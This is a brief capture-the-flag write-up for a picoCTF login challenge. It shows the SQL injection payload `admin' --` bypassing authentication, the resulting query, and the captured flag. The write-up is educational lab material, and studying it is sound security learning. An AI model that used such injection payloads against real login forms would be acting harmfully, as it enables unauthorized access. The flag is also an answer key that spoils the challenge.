# SQLiLite

## Challenge

Can you login to this website?

## Solution

This is a basic SQL injection. Using the payload `admin' --` (because the hint says to sign in as the `admin` user) and anything for the password logs in. After logging in, this is shown:

```
username: admin' --
password: asd
SQL query: SELECT * FROM users WHERE name='admin' --' AND password='asd'

Logged in! But can you see the flag, it is in plainsight.
```

The flag is in the source code.

### Flag

`picoCTF{L00k5_l1k3_y0u_solv3d_it_9b0a4e21}`